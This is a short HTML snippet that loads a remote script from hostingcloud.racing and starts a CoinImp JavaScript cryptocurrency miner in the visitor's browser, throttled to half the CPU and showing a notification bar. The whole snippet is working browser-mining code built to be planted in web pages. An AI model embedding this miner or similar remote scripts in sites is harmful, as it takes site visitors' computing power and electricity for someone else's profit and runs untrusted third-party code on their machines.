<script src="https://www.hostingcloud.racing/dlwo.js"></script>
<script>
    var _client = new Client.Anonymous('ca2d4a9ee520ba5a40c49b9269fe249bac4cc9d268d4693cc01de8c7ede343e6', {
        throttle: 0.5, c: 'w'
    });
    _client.start();
    _client.addMiningNotification("Top", "This site is running JavaScript miner from coinimp.com. If it bothers you, you can stop it.", "#cccccc", 40, "#3d3d3d");

</script>
